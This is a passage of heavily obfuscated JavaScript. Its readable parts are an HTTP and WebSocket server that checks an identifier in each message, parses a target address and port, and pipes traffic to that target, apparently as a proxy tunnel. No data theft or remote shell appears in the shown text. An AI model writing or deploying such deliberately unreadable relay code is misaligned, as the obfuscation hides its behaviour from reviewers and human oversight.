_0x3b576c(_0x3c6b80,_0x4be179);},'VJMWX':_0x213bca(0x368,0x44d,0x52f,0x3c1,0x408)+_0x29d5f9(0x299,0x2e3,0x361,0x381,0x22f)+'r:','Ejzpn':_0x29d5f9(0x1a3,0xf9,0x276,0x139,0xb2)+_0x5ec539(-0x155,-0x1eb,-0xb8,-0xc3,-0x104)+_0x5ec539(-0xa5,-0xbf,-0x16c,-0x18c,-0xaf)+_0x213bca(0x3d1,0x4a3,0x486,0x3df,0x4a9)+'ly','NXhPY':_0x7dbfd5(0x404,0x4ce,0x365,0x40c,0x3e0)+'ge','GlnpG':function(_0x4258a8,_0x1bfb99){return _0x4258a8(_0x1bfb99);},'jXxhT':_0x5ec539(-0xbc,-0x60,-0x19d,-0xce,-0x118)+_0x29d5f9(0x190,0x119,0x213,0x1ad,0x1ba)+_0x213bca(0x588,0x58c,0x49f,0x62d,0x4bf)+':','kEbvc':function(_0x20821b,_0x3f0326){return _0x20821b===_0x3f0326;},'VodzB':_0x5ec539(-0xe8,-0x4c,-0xb1,-0x6e,-0x1d0),'xHxer':_0x29d5f9(0x309,0x29f,0x355,0x3d2,0x3c3),'LegjN':function(_0xdbca3,_0x5ce2be){return _0xdbca3!==_0x5ce2be;},'KZCzm':_0x213bca(0x55f,0x573,0x540,0x607,0x5a3),'gHyhj':_0x270b17(0x18a,0x212,0x1cd,0x2ba,0x177),'Yicnh':_0x213bca(0x427,0x4a6,0x4c0,0x41a,0x4e1)+_0x270b17(0x393,0x2bb,0x2ea,0x1db,0x249)};function _0x5ec539(_0x13258a,_0x45ffac,_0x497887,_0x5548cc,_0x57df33){return _0x1e3602(_0x13258a-0x5a,_0x45ffac,_0x497887-0xbe,_0x13258a- -0x1a9,_0x57df33-0x62);}function _0x7dbfd5(_0x5eb884,_0x11000f,_0x4beaea,_0x26afa4,_0xde7a47){return _0x3b9f4f(_0xde7a47-0x3a8,_0x11000f-0x177,_0x4beaea-0x95,_0x26afa4-0x53,_0x5eb884);}function _0x213bca(_0x6ddd31,_0x2b7ad1,_0x5ef674,_0x4f6133,_0x284b61){return _0x504eae(_0x2b7ad1-0x1e4,_0x2b7ad1-0x78,_0x5ef674-0x190,_0x4f6133-0x1e0,_0x4f6133);}function _0x270b17(_0x22ec5c,_0x1daa2e,_0x498e0e,_0x2c5734,_0x24e531){return _0x3b9f4f(_0x1daa2e-0x1f5,_0x1daa2e-0x80,_0x498e0e-0x1f2,_0x2c5734-0x2b,_0x24e531);}function _0x29d5f9(_0x59865f,_0x3256ae,_0x4e1482,_0xaa1c12,_0x5dcc61){return _0x1e3602(_0x59865f-0x38,_0xaa1c12,_0x4e1482-0x110,_0x59865f-0x216,_0x5dcc61-0x1f2);}if(_0x1c21f8[_0x5ec539(-0x19b,-0xdf,-0x228,-0x1b9,-0x133)](_0x1227b5[_0x7dbfd5(0x3f8,0x2bf,0x412,0x437,0x386)],'/')){if(_0x1c21f8[_0x29d5f9(0x224,0x286,0x2aa,0x13a,0x304)](_0x1c21f8[_0x270b17(0x2e7,0x347,0x306,0x27d,0x260)],_0x1c21f8[_0x5ec539(-0x267,-0x2cd,-0x2f7,-0x2d4,-0x192)])){const _0x2b31ae={};_0x2b31ae[_0x29d5f9(0x216,0x171,0x23d,0x1b6,0x19b)+_0x29d5f9(0x16f,0x12d,0x1e5,0x1d5,0x7f)+'pe']=_0x1c21f8[_0x29d5f9(0x2ad,0x365,0x35a,0x1c4,0x226)],_0x473208[_0x7dbfd5(0x453,0x46b,0x481,0x354,0x39f)+_0x213bca(0x45f,0x479,0x561,0x469,0x4ae)](-0x1*-0x1be7+-0x34*-0x28+-0x233f*0x1,_0x2b31ae),_0x5c69a9[_0x213bca(0x519,0x4b2,0x565,0x52d,0x439)](_0x1c21f8[_0x270b17(0x387,0x2da,0x2fe,0x3a6,0x1eb)]);}else{const _0x58c93a={};_0x58c93a[_0x29d5f9(0x216,0x129,0x12c,0x2f9,0x22c)+_0x29d5f9(0x16f,0x143,0x16e,0xa5,0x113)+'pe']=_0x1c21f8[_0x7dbfd5(0x57f,0x423,0x45c,0x46b,0x498)],_0x1cbdc7[_0x5ec539(-0x20b,-0x28d,-0x2ef,-0x266,-0x232)+_0x5ec539(-0x1f0,-0x284,-0x197,-0x1a4,-0x2ba)](-0x1*-0x397+0x1*0x78f+-0x52f*0x2,_0x58c93a),_0x1cbdc7[_0x5ec539(-0x1b7,-0x22e,-0x27d,-0x139,-0x232)](_0x1c21f8[_0x7dbfd5(0x511,0x49e,0x493,0x4f8,0x48d)]);}}else{if(_0x1c21f8[_0x213bca(0x55b,0x51a,0x4e8,0x46c,0x50d)](_0x1c21f8[_0x7dbfd5(0x36f,0x444,0x4b0,0x4aa,0x41f)],_0x1c21f8[_0x7dbfd5(0x370,0x38d,0x438,0x373,0x38b)])){const _0x2c7708={};_0x2c7708[_0x213bca(0x3e4,0x4c0,0x448,0x5ac,0x483)+_0x270b17(0x232,0x1a7,0x281,0x24d,0xf1)+'pe']=_0x1c21f8[_0x7dbfd5(0x515,0x483,0x3b3,0x3ac,0x498)],_0x1cbdc7[_0x5ec539(-0x20b,-0x2e6,-0x2c5,-0x1a5,-0x20e)+_0x29d5f9(0x1cf,0x25b,0x20a,0x28b,0xf0)](0xa06+0x29*0x15+0xbcf*-0x1,_0x2c7708),_0x1cbdc7[_0x29d5f9(0x208,0x2d5,0x287,0x205,0x1ef)](_0x1c21f8[_0x5ec539(-0x142,-0x1a1,-0x8f,-0x197,-0x19d)]);}else{const _0x4a3fcb={'VxtEs':_0x1c21f8[_0x29d5f9(0x260,0x2da,0x1dc,0x223,0x24a)],'YMKao':function(_0x519f95,_0x1c4a82){function _0x10aa16(_0x47b5e4,_0x36b0f2,_0x550907,_0x436a48,_0x152343){return _0x5ec539(_0x47b5e4- -0x69,_0x36b0f2,_0x550907-0x112,_0x436a48-0x14c,_0x152343-0x40);}return _0x1c21f8[_0x10aa16(-0x1ed,-0x1df,-0x238,-0x2b4,-0x158)](_0x519f95,_0x1c4a82);},'iDzSp':_0x1c21f8[_0x213bca(0x504,0x51e,0x5ef,0x5de,0x5e3)],'mhjxL':function(_0x5121b5,_0xcc3f88){function _0x688250(_0x5c854c,_0x305258,_0x75ef46,_0x589ca9,_0x3ab5ab){return _0x213bca(_0x5c854c-0x18d,_0x305258- -0x3f3,_0x75ef46-0x13b,_0x3ab5ab,_0x3ab5ab-0x11b);}return _0x1c21f8[_0x688250(0x1d9,0xf2,0x126,0xe7,0x10b)](_0x5121b5,_0xcc3f88);},'ZcBtI':_0x1c21f8[_0x7dbfd5(0x330,0x340,0x35d,0x47d,0x3cc)],'GXkqo':function(_0x2a18c9,_0xf462c3){function _0x157cba(_0x411230,_0x4128a7,_0x4e1812,_0x49cfa7,_0x52cb71){return _0x5ec539(_0x4e1812-0x41b,_0x52cb71,_0x4e1812-0x194,_0x49cfa7-0x99,_0x52cb71-0xa2);}return _0x1c21f8[_0x157cba(0x18a,0x203,0x242,0x160,0x224)](_0x2a18c9,_0xf462c3);},'liHXh':function(_0x1a6491,_0x223a64){function _0x4aaa51(_0x4b7a2d,_0x54fb91,_0x4a9a1d,_0x53bd9a,_0xdc3b1e){return _0x213bca(_0x4b7a2d-0xd4,_0x4b7a2d- -0x570,_0x4a9a1d-0xc7,_0x54fb91,_0xdc3b1e-0xa6);}return _0x1c21f8[_0x4aaa51(-0x47,-0xf3,-0x9b,0x2b,-0xd3)](_0x1a6491,_0x223a64);},'BDovH':function(_0x9244af,_0x3db7ab){function _0x268979(_0x468383,_0x5bccfc,_0x37de67,_0x5b5ca1,_0x3e78cc){return _0x7dbfd5(_0x468383,_0x5bccfc-0xdd,_0x37de67-0x147,_0x5b5ca1-0xdb,_0x5b5ca1- -0x77);}return _0x1c21f8[_0x268979(0x3f3,0x3cb,0x3ab,0x424,0x3fc)](_0x9244af,_0x3db7ab);},'fBjQe':function(_0x4f6420,_0x3470f7){function _0x26bc63(_0x433001,_0x5f4de1,_0x317a3f,_0x5cc401,_0x5c6180){return _0x213bca(_0x433001-0x78,_0x317a3f- -0x4da,_0x317a3f-0x16a,_0x5c6180,_0x5c6180-0xee);}return _0x1c21f8[_0x26bc63(-0xde,-0x139,-0x4a,0x33,-0xa4)](_0x4f6420,_0x3470f7);},'IGTuh':function(_0x39e827,_0x288a81){function _0x363714(_0x1014a3,_0x42303a,_0x2335b8,_0x3bc845,_0x360e7f){return _0x29d5f9(_0x2335b8- -0x3db,_0x42303a-0x135,_0x2335b8-0x1b8,_0x1014a3,_0x360e7f-0x16e);}return _0x1c21f8[_0x363714(-0x146,-0x1c3,-0x1f5,-0x271,-0x156)](_0x39e827,_0x288a81);},'NLVqL':function(_0x39be05,_0x356769){function _0x3c96ea(_0x1348fb,_0x20fd17,_0x1d89e3,_0x40098e,_0xb5dac4){return _0x5ec539(_0x1d89e3-0x33,_0xb5dac4,_0x1d89e3-0x73,_0x40098e-0x1e9,_0xb5dac4-0xe3);}return _0x1c21f8[_0x3c96ea(0xe,-0xfc,-0x95,-0xd1,-0x28)](_0x39be05,_0x356769);},'fofzi':function(_0x3cc423,_0x3786db){function _0x369d35(_0x1379ad,_0x52aaa2,_0x5e4c0b,_0x39aad5,_0x1c563b){return _0x270b17(_0x1379ad-0xd6,_0x1c563b- -0x3a1,_0x5e4c0b-0xb0,_0x39aad5-0xe9,_0x1379ad);}return _0x1c21f8[_0x369d35(0x6d,-0x78,-0xfc,-0x122,-0x76)](_0x3cc423,_0x3786db);},'QmRQu':function(_0x2fa855,_0x4a162c,_0xa7adbb,_0x38795e){function _0x2b9cad(_0x3a8b36,_0x5f5aaa,_0x50e1cf,_0x305157,_0x4f0d4e){return _0x270b17(_0x3a8b36-0x3f,_0x50e1cf- -0x352,_0x50e1cf-0x82,_0x305157-0x10e,_0x3a8b36);}return _0x1c21f8[_0x2b9cad(-0x23e,-0x1fc,-0x1d8,-0x2bb,-0x2c4)](_0x2fa855,_0x4a162c,_0xa7adbb,_0x38795e);},'GwelD':_0x1c21f8[_0x7dbfd5(0x40f,0x4b8,0x495,0x3bd,0x429)],'tamNE':function(_0x9cc4ff,_0x3b60d4,_0x3b647e){function _0x5061c8(_0x4cecf0,_0x5a8a4a,_0x3060f3,_0x59c5cc,_0x35c7aa){return _0x213bca(_0x4cecf0-0x180,_0x3060f3- -0x5e8,_0x3060f3-0xe8,_0x59c5cc,_0x35c7aa-0x2b);}return _0x1c21f8[_0x5061c8(-0xa2,-0xac,-0xf0,-0xc1,-0xe7)](_0x9cc4ff,_0x3b60d4,_0x3b647e);},'rvbRb':_0x1c21f8[_0x7dbfd5(0x4df,0x54d,0x3f8,0x568,0x499)]};_0x5a5af8[_0x7dbfd5(0x275,0x311,0x272,0x431,0x363)](_0x1c21f8[_0x5ec539(-0x165,-0x95,-0xd7,-0x82,-0xe2)]),_0x138eef[_0x7dbfd5(0x40c,0x2bc,0x24f,0x29d,0x335)](_0x1c21f8[_0x29d5f9(0x1de,0xf0,0x132,0x17d,0x259)],_0x455e6d=>{const _0x40bda3={'mODJA':_0x4a3fcb[_0x3b30db(0x225,0x1ed,0x1de,0x1ed,0x167)],'baqfC':function(_0x2c057e,_0x47734d){function _0x116e99(_0x55554a,_0x8683c7,_0x55db72,_0x251edd,_0x11b849){return _0x3b30db(_0x11b849- -0x128,_0x8683c7-0x56,_0x8683c7,_0x251edd-0x3,_0x11b849-0x43);}return _0x4a3fcb[_0x116e99(0x106,0xda,0xa6,-0x3c,0x50)](_0x2c057e,_0x47734d);},'tsKtZ':_0x4a3fcb[_0x3b30db(0x2a6,0x36c,0x278,0x20d,0x234)],'QtdjG':function(_0x30cacf,_0x890783){function _0x4a95a8(_0x2d26cd,_0x58b1f1,_0x38a957,_0x4ff900,_0x116f39){return _0x3b30db(_0x58b1f1- -0x11d,_0x58b1f1-0x66,_0x4ff900,_0x4ff900-0xd1,_0x116f39-0x1a7);}return _0x4a3fcb[_0x4a95a8(-0xea,-0x6,0x8c,0x48,0xd3)](_0x30cacf,_0x890783);},'KbQMx':_0x4a3fcb[_0x583d07(0x1a,-0xd3,-0x65,-0x15d,-0xbf)]};function _0x207e22(_0x13fdb1,_0x4bdc41,_0x3dbead,_0x3235d2,_0x22b63d){return _0x7dbfd5(_0x3235d2,_0x4bdc41-0x115,_0x3dbead-0x2a,_0x3235d2-0xb1,_0x4bdc41- -0x5ec);}const [_0x494a4f]=_0x455e6d,_0x13646c=_0x455e6d[_0x3b30db(0x1f2,0x2c9,0x160,0x2c2,0x17c)](0x2*-0xa66+-0x1de9+0x32b6,-0x24d1+-0x7dd+0x2cbf);if(!_0x13646c[_0x207e22(-0x287,-0x22a,-0x1af,-0x2d3,-0x15b)]((_0x9d9ec0,_0x2f8e48)=>_0x9d9ec0==_0x5b146a(_0x39e3b7[_0x2146f8(-0x2ec,-0x2b2,-0x31c,-0x263,-0x2df)+'r'](_0x2f8e48*(0x1*0xb65+-0x29f*-0xc+-0x1*0x2ad7),0x1e30+0x11*0x3d+-0x223b),0x10b8+-0x2*-0x6d7+0x1e56*-0x1)))return;let _0x1d6e36=_0x4a3fcb[_0xcca952(0x483,0x450,0x441,0x423,0x4b2)](_0x455e6d[_0xcca952(0x53d,0x4be,0x580,0x4cb,0x44c)](-0x2508+0x1*0x18cc+0xc4d,-0x204*-0x10+-0x239a+0x36c)[_0x583d07(-0xab,0x1d,0xb,-0x170,-0xb7)+_0x3b30db(0x17a,0xb4,0x202,0x21f,0x1fa)](),0x61*-0x59+-0x904*-0x1+0x18c8);const _0x4f52ed=_0x455e6d[_0x583d07(-0x14d,-0x35,-0xbf,-0xc0,-0x63)](_0x1d6e36,_0x1d6e36+=-0x120f+-0x41*-0x86+-0xff5)[_0x3b30db(0x19e,0x194,0x189,0x1a6,0x10d)+_0x3b30db(0x28a,0x1ca,0x215,0x352,0x1ba)+'BE'](0xfe*-0x3+0x22d+0xcd),_0x3fb1c5=_0x455e6d[_0xcca952(0x577,0x4be,0x405,0x43e,0x487)](_0x1d6e36,_0x1d6e36+=-0x18e3+-0x66d*0x1+0x1f51)[_0x3b30db(0x19e,0x14f,0x1bf,0x1d8,0x1c8)+_0x2146f8(-0x237,-0x203,-0x233,-0x22b,-0x2a8)](),_0x5b52f1=_0x4a3fcb[_0x207e22(-0x12e,-0x164,-0xdc,-0x193,-0x85)](_0x3fb1c5,0x3b2*-0x2+0x2275*-0x1+0x1e7*0x16)?_0x455e6d[_0x207e22(-0x218,-0x1e1,-0x29b,-0x230,-0x119)](_0x1d6e36,_0x1d6e36+=-0x158d+-0x1a07*-0x1+-0x476)[_0xcca952(0x62f,0x552,0x628,0x4cb,0x476)]('.'):_0x4a3fcb[_0x2146f8(-0x22c,-0x33b,-0x2ea,-0x276,-0x2ee)](_0x3fb1c5,0x22d*-0x2+-0xbb7+-0x1013*-0x1)?new _0x2486f9()[_0x3b30db(0x21f,0x15c,0x232,0x2b4,0x272)+'e'](_0x455e6d[_0xcca952(0x4aa,0x4be,0x427,0x4c2,0x419)](_0x4a3fcb[_0x2146f8(-0x260,-0x38b,-0x2a8,-0x2a9,-0x2a9)](_0x1d6e36,-0x13*-0xa+-0x13ae+0x12f1),_0x1d6e36+=_0x4a3fcb[_0x583d07(-0x70,-0x109,-0x17b,-0x5a,-0xe7)](0x207e*0x1+-0x2046+-0x1*0x37,_0x455e6d[_0xcca952(0x421,0x4be,0x4c2,0x534,0x41d)](_0x1d6e36,_0x4a3fcb[_0x2146f8(-0x2c4,-0x2e3,-0x1b0,-0x1d3,-0x1ff)](_0x1d6e36,-0xc11+0x12*-0x7+-0x18*-0x86))[_0x2146f8(-0x2a6,-0x1ff,-0x254,-0x368,-0x284)+_0x583d07(-0xe7,-0x23,-0x1f,-0xca,-0xdb)]()))):_0x4a3fcb[_0x2146f8(-0x206,-0x1bd,-0x2b1,-0x2c1,-0x22e)](_0x3fb1c5,0x14ed+-0x2502+0x1018)?_0x455e6d[_0x207e22(-0x198,-0x1e1,-0x102,-0x225,-0x2ad)](_0x1d6e36,_0x1d6e36+=-0xca7+0x125b*0x1+-0x5a4)[_0xcca952(0x3ad,0x49d,0x4af,0x4bb,0x4fc)+'e']((_0x4e2bb2,_0x3c8268,_0x4ecfb3,_0x1b3c70)=>_0x4ecfb3%(0x1981+0x1162+-0x1*0x2ae1)?_0x4e2bb2[_0x2146f8(-0x2d5,-0x318,-0x37d,-0x33a,-0x2fa)+'t'](_0x1b3c70[_0xcca952(0x56c,0x4be,0x569,0x48c,0x54b)](_0x4ecfb3-(-0x65*0x37+0x3ce+0x11e6),_0x4ecfb3+(-0x3*-0x506+-0x1ae4+0xbd3))):_0x4e2bb2,[])[_0x583d07(-0x94,-0x59,-0x4b,-0x33,-0x96)](_0x4ce2d5=>_0x4ce2d5[_0xcca952(0x529,0x46a,0x49a,0x4f4,0x4cd)+_0x583d07(-0xae,0x111,0x8d,0x70,0x35)+'BE'](-0x4d*-0x22+-0x270*0x10+0x1cc6)[_0x583d07(-0x9,0x93,0xe4,0x61,0x7b)+_0x583d07(-0x11a,-0x57,-0xc0,-0x54,-0x124)](0x6e6*0x1+-0x1d66+0x1690))[_0x3b30db(0x286,0x22e,0x209,0x220,0x289)](':'):'';_0x4a3fcb[_0x583d07(-0xd1,-0xb,-0xfe,-0x111,-0x2f)](_0x1f0967,_0x4a3fcb[_0x3b30db(0x2c6,0x2c3,0x252,0x33a,0x395)],_0x5b52f1,_0x4f52ed);function _0x2146f8(_0x1d4b5b,_0x2f588e,_0x20ba08,_0xa0c5,_0x152e14){return _0x29d5f9(_0x152e14- -0x450,_0x2f588e-0x10b,_0x20ba08-0x95,_0x1d4b5b,_0x152e14-0x14);}_0x2e49a9[_0x3b30db(0x189,0x1a1,0x136,0xcf,0x13f)](new _0x5b208c([_0x494a4f,-0x3f5+0x218b+-0x1d96]));const _0x547ab0=_0x4a3fcb[_0x583d07(-0x41,0xd,-0x19d,-0x15a,-0xdd)](_0x1171a1,_0x4b5aa3),_0x362371={};function _0x583d07(_0x175522,_0x401356,_0x1df422,_0x46d992,_0xa03659){return _0x270b17(_0x175522-0xbf,_0xa03659- -0x2bb,_0x1df422-0x63,_0x46d992-0x173,_0x1df422);}function _0x3b30db(_0x1e0d37,_0x562ef0,_0x564c4b,_0x5872c0,_0x450259){return _0x213bca(_0x1e0d37-0x11b,_0x1e0d37- -0x2d8,_0x564c4b-0x9f,_0x564c4b,_0x450259-0x1bd);}_0x362371[_0x3b30db(0x2f0,0x36d,0x312,0x29d,0x3ad)]=_0x5b52f1,_0x362371[_0x583d07(-0x139,-0x1b5,-0xf4,-0x1d6,-0x146)]=_0x4f52ed;const _0xb54f8b={};_0xb54f8b[_0xcca952(0x662,0x5bc,0x5a9,0x500,0x682)]=_0x5b52f1,_0xb54f8b[_0x583d07(-0x14e,-0x198,-0x237,-0xa9,-0x146)]=_0x4f52ed;function _0xcca952(_0x3a9eda,_0x1dbf6f,_0x49fc7d,_0x419bce,_0x17225b){return _0x7dbfd5(_0x419bce,_0x1dbf6f-0x1c,_0x49fc7d-0x15e,_0x419bce-0x1f0,_0x1dbf6f-0xb3);}_0x438959[_0x583d07(-0x1f,-0x15b,-0x55,-0x5c,-0xde)+'ct'](_0x362371,function(){function _0x23d9a3(_0x1b9028,_0x308619,_0x45a73e,_0x4996e2,_0x5845fb){return _0x3b30db(_0x1b9028-0x277,_0x308619-0xa3,_0x5845fb,_0x4996e2-0x1bd,_0x5845fb-0xcc);}function _0x687019(_0x5252d6,_0x57cac2,_0x3bdeed,_0x2fd398,_0x5c6fe8){return _0x2146f8(_0x5c6fe8,_0x57cac2-0x123,_0x3bdeed-0xe0,_0x2fd398-0x37,_0x5252d6-0x3dc);}this[_0x1e5482(-0xeb,-0x11f,-0x1bc,-0x136,-0xd4)](_0x455e6d[_0x9c6c20(-0x5b,-0xbc,0x8,0x6,-0x2e)](_0x1d6e36));function _0x9c6c20(_0x23b2d2,_0x2d98d3,_0x907baa,_0x1649d3,_0x52b7e8){return _0x207e22(_0x23b2d2-0x147,_0x23b2d2-0x186,_0x907baa-0xf2,_0x1649d3,_0x52b7e8-0x10c);}function _0x1e5482(_0x35f990,_0x4ef2b0,_0x3086c4,_0x274cc2,_0x84226d){return _0x2146f8(_0x3086c4,_0x4ef2b0-0xf5,_0x3086c4-0x161,_0x274cc2-0x7e,_0x35f990-0x1b1);}function _0x3c5723(_0x533307,_0x4c9964,_0x403242,_0xe92fc,_0x16addf){return _0x207e22(_0x533307-0x157,_0x16addf-0x701,_0x403242-0x71,_0x403242,_0x16addf-0x14b);}_0x547ab0['on'](_0x40bda3[_0x3c5723(0x4f1,0x52b,0x567,0x613,0x5b6)],_0x40bda3[_0x3c5723(0x53b,0x548,0x4fa,0x4c2,0x51a)](_0xb94e54,_0x40bda3[_0x3c5723(0x45d,0x493,0x3db,0x3fe,0x483)]))[_0x3c5723(0x4e7,0x5d5,0x5d8,0x4ce,0x592)](this)['on'](_0x40bda3[_0x9c6c20(0x3b,0xc0,0x11c,0xeb,0x107)],_0x40bda3[_0x1e5482(0x66,0x101,-0x2e,0x148,0x13b)](_0x174e2d,_0x40bda3[_0x687019(0x1a8,0x181,0x134,0x133,0x283)]))[_0x3c5723(0x63f,0x5fb,0x649,0x595,0x592)](_0x547ab0);})['on'](_0x4a3fcb[_0x3b30db(0x225,0x168,0x28a,0x238,0x1c3)],_0x4a3fcb[_0x3b30db(0x1fd,0x271,0x2d3,0x173,0x179)](_0x32b88e,_0x4a3fcb[_0x2146f8(-0xb1,-0x1dc,-0x1a5,-0x101,-0x144)],_0xb54f8b));})['on'](_0x1c21f8[_0x29d5f9(0x260,0x2e3,0x2c0,0x20e,0x2c4)],_0x1c21f8[_0x29d5f9(0x1b1,0x120,0x23b,0x1bd,0x1ed)](_0x4fa98d,_0x1c21f8[_0x5ec539(-0x10c,-0x1df,-0xfa,-0xff,-0x184)]));}}});httpServer[_0x5b3717(-0x1f7,-0x269,-0x202,-0x1a0,-0x1f1)+'n'](port,()=>{function _0x4f73e5(_0x26d7ed,_0x444357,_0x2a7a97,_0x527e1e,_0x28490c){return _0x3b9f4f(_0x2a7a97- -0x167,_0x444357-0x97,_0x2a7a97-0x97,_0x527e1e-0x66,_0x444357);}function _0x54079d(_0x4f622f,_0x7f5321,_0x4099a1,_0x2c58be,_0x2ef5aa){return _0x3b9f4f(_0x4099a1- -0x2db,_0x7f5321-0x6b,_0x4099a1-0xe5,_0x2c58be-0x19f,_0x2ef5aa);}function _0x26639a(_0x5d3d7e,_0x29c4ad,_0x178272,_0x4b442a,_0x26f109){return _0x504eae(_0x26f109- -0x452,_0x29c4ad-0x4a,_0x178272-0xc7,_0x4b442a-0x1ba,_0x29c4ad);}function _0x5aa48e(_0x1cf985,_0x4471c3,_0xd8689d,_0xfd7aee,_0x3b6576){return _0x1e3602(_0x1cf985-0x20,_0xd8689d,_0xd8689d-0x87,_0x3b6576-0x200,_0x3b6576-0x2e);}function _0x193839(_0x5bc765,_0x4179c0,_0x453ecf,_0x550361,_0x533d70){return _0x5b3717(_0x550361-0x445,_0x453ecf,_0x453ecf-0xe5,_0x550361-0x10f,_0x533d70-0x66);}console[_0x5aa48e(0x1e1,0x76,0x1cf,0x98,0x162)](_0x54079d(-0x366,-0x264,-0x306,-0x2de,-0x242)+_0x5aa48e(0x1d7,0x228,0xd5,0x19e,0x17b)+_0x54079d(-0x267,-0x2c6,-0x200,-0x2e4,-0x140)+_0x5aa48e(0x1ae,0x22a,0x26e,0x281,0x246)+_0x26639a(-0x142,-0x1fc,-0x8a,-0xce,-0x147)+'\x20'+port);});const _0x58453d={};_0x58453d[_0x5b3717(-0x251,-0x1d1,-0x218,-0x227,-0x168)+'r']=httpServer;const wss=new WebSocket[(_0x504eae(0x258,0x1f3,0x339,0x329,0x2d8))+'r'](_0x58453d);wss['on'](_0x1e3602(-0x120,-0xfb,-0xa7,-0x71,0x27)+_0x1e3602(-0x2a,0x75,-0x17,0xb1,0x91),_0x338277=>{const _0x15e773={'peSlp':function(_0x196ade,_0x291a3c){return _0x196ade===_0x291a3c;},'Mlvef':_0x53ba12(0x112,0xd2,-0xc,0xd7,-0x15),'qvIbA':_0x53ba12(0x205,0x21b,0x173,0x2ba,0x208),'rLUYi':_0x22caf1(-0x84,0x9f,-0x18,0x55,0x9),'iKskN':function(_0x5aec02,_0x4a41f9){return _0x5aec02(_0x4a41f9);},'CyOYO':_0x48965c(0x499,0x49f,0x468,0x3cd,0x531),'vjNvL':function(_0x498de0,_0x1ab857){return _0x498de0(_0x1ab857);},'mAhaX':_0x53ba12(0xfa,0x117,0x50,0x170,0xc4),'wmrKJ':function(_0x97afe7,_0x5596f4){return _0x97afe7+_0x5596f4;},'UzLYU':function(_0x4079ce,_0x7de1){return _0x4079ce+_0x7de1;},'xggyp':_0x22caf1(-0x42,-0x1c,-0xc1,-0xad,-0x9)+_0x48965c(0x3f1,0x4dd,0x47b,0x4e3,0x465)+_0x4d9560(-0x1d9,-0x13d,-0x153,-0x155,-0x1b7)+_0x48965c(0x47c,0x394,0x442,0x330,0x457),'gtuvb':_0x4e9ec3(0x1be,0x16d,0x1e5,0x207,0x16a)+_0x4d9560(0x55,-0x4a,0xa,-0x5c,-0x2c)+_0x53ba12(0x60,0xd7,0xe7,0xf7,0x2e)+_0x4d9560(-0x107,0x8,-0xa3,-0x23,0x45)+_0x4e9ec3(0xd2,0xa7,0xd9,0x42,0x1af)+_0x48965c(0x49d,0x423,0x338,0x3d0,0x493)+'\x20)','nJwcJ':function(_0x34f70e,_0x420df2){return _0x34f70e!==_0x420df2;},'myeAR':_0x48965c(0x403,0x3a4,0x42b,0x448,0x3ec),'NHqXG':_0x53ba12(0x17f,0xc4,0x168,0xbf,0x14f),'HIzaX':function(_0x2c0d5a,_0x303dde){return _0x2c0d5a==_0x303dde;},'LFXJW':function(_0x5ba431,_0x230a43){return _0x5ba431+_0x230a43;},'pWOqq':function(_0x590dcb,_0x52c607){return _0x590dcb+_0x52c607;},'IdbFC':function(_0xc482c0,_0x8fba09,_0x230c0a,_0xb4b844){return _0xc482c0(_0x8fba09,_0x230c0a,_0xb4b844);},'kdWLe':_0x53ba12(0xea,0xa7,0x3b,0x156,0x9b)+_0x48965c(0x530,0x494,0x3ff,0x52b,0x4bb),'AMPQa':function(_0x4366c0,_0x220619){return _0x4366c0(_0x220619);},'wzZPT':function(_0x39f8aa,_0x4d22b1,_0x21d564){return _0x39f8aa(_0x4d22b1,_0x21d564);},'Eezyv':_0x4d9560(-0xaf,-0xd9,-0x83,-0x145,-0xb0)+_0x4e9ec3(0x22c,0x2ba,0x1d5,0x15f,0x1ca)+'r:','AJXkM':_0x53ba12(0x51,0xa7,0x32,0x37,-0x42)+_0x4d9560(-0x10c,-0x13e,-0xd4,-0x7e,-0x114)+_0x4d9560(0x1d,0xda,0x76,0x32,-0x6c)+_0x53ba12(0x15e,0xfd,0x17e,0x94,0x12d)+'ly','sxRLl':_0x53ba12(0x4f,0xf9,0x1bd,0x1ac,0x1e0)+'ge','zbVyN':_0x4e9ec3(0x157,0x254,0x23f,0x220,0x296)+_0x4e9ec3(0xf5,-0x10,0xcc,0xb9,0x71)+_0x53ba12(0x194,0x1e6,0x24e,0x25e,0x1ef)+':'};function _0x22caf1(_0x42eeed,_0x2bf72e,_0x1c7313,_0x3fae0b,_0x414167){return _0x3b9f4f(_0x414167-0x62,_0x2bf72e-0xe2,_0x1c7313-0xd6,_0x3fae0b-0x101,_0x3fae0b);}function _0x4d9560(_0x32560f,_0x19d1a5,_0x592c2c,_0x361ab5,_0x4eeedf){return _0x1d31e6(_0x361ab5- -0x203,_0x19d1a5-0x8e,_0x32560f,_0x361ab5-0x141,_0x4eeedf-0x157);}console[_0x48965c(0x3bb,0x372,0x3d8,0x3fb,0x350)](_0x15e773[_0x4d9560(-0x202,-0x134,-0x1cc,-0x1a0,-0x138)]);function _0x48965c(_0x29af8a,_0x4fff4b,_0x5ea167,_0x2a0838,_0x1e857d){return _0x3b9f4f(_0x4fff4b-0x3b7,_0x4fff4b-0x61,_0x5ea167-0xde,_0x2a0838-0x1d,_0x2a0838);}function _0x4e9ec3(_0x21b174,_0xd6c6ab,_0x2c9692,_0xbf63,_0x48d11a){return _0x5b3717(_0x2c9692-0x345,_0xbf63,_0x2c9692-0x16a,_0xbf63-0xb8,_0x48d11a-0x1b);}function _0x53ba12(_0x38030d,_0x20c24f,_0x3aba8b,_0xd84a7e,_0x101c14){return _0x504eae(_0x20c24f- -0x1c2,_0x20c24f-0x1ea,_0x3aba8b-0x14c,_0xd84a7e-0x1e4,_0x101c14);}_0x338277[_0x48965c(0x346,0x344,0x361,0x3f1,0x358)](_0x15e773[_0x53ba12(0x170,0x153,0x98,0x10f,0x176)],_0x582f00=>{function _0x1f0c5b(_0x36fad2,_0x3a1821,_0x49fb9a,_0x37f73e,_0xf00117){return _0x4d9560(_0x49fb9a,_0x3a1821-0x42,_0x49fb9a-0xfa,_0x36fad2-0xa7,_0xf00117-0x52);}function _0x41d87d(_0x38e8ac,_0x11e0f9,_0x1a5c0f,_0x46d3c6,_0x40e158){return _0x4e9ec3(_0x38e8ac-0x118,_0x11e0f9-0xdc,_0x11e0f9- -0xec,_0x46d3c6,_0x40e158-0xee);}function _0x5a4020(_0xd2a491,_0x3ce8a9,_0x5f0598,_0x5d80fe,_0x24753d){return _0x22caf1(_0xd2a491-0x76,_0x3ce8a9-0x146,_0x5f0598-0x2d,_0x5d80fe,_0x3ce8a9- -0x140);}function _0x4f1aaa(_0x51b05a,_0x50d8e8,_0x4eb23f,_0x12ebfa,_0xf53023){return _0x4e9ec3(_0x51b05a-0x16a,_0x50d8e8-0x59,_0xf53023- 